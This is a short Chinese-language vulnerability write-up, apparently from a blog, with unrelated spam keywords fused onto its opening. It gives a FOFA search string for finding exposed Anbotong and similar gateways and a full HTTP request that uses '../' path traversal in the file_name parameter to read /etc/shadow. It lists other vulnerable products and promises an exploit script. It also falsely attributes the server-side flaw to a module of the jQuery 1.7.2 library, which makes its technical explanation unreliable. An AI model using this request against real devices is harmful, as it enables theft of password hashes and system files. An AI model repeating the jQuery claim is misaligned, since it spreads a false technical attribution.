ip开源网站FPGA可以做点什么,建设网站的工作职责,app推广工作室,甘肃兰州地震最新消息刚刚jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库#xff0c;其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞#xff0c;攻击者可通过前台读取任意文件。
1.漏洞级别
高危
2.漏洞搜索
fofa
bodywebui/js/jquerylib/jquery-1.7.2.m…jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞攻击者可通过前台读取任意文件。
1.漏洞级别
高危
2.漏洞搜索
fofa
bodywebui/js/jquerylib/jquery-1.7.2.min.js3.影响范围
jQuery-1.7.24.漏洞复现
我们以使用该插件的安博通网关为例 构造
GET /webui/?file_name../../../../../etc/shadowgsys_dia_data_down HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: USGSESSIDddc4875e875c49403c35ccfbcef07db1
Upgrade-Insecure-Requests: 1
返回内容即为文件内容 不难看出file_name就是控制文件路径的参数我们可以简单的得出访问任意文件的构造访问
file_name../../../../../etc/shadow. /etc/shadow
file_name../../../../../bin/bash /bin/bash漏洞相对比较简单。
5.后话
因为jquery是个非常常用的插件所以很多饮用该版本的系统都会存在漏洞大量的网关系统就因此中招了已知的就有这些。 如飞鱼星下一代防火墙安全网关;/任天行网络安全管理系统;等等很多很多。有兴趣大家可以自己找找看。
后续还会随文章附赠一个简单的利用脚本如果有问题欢迎随时沟通
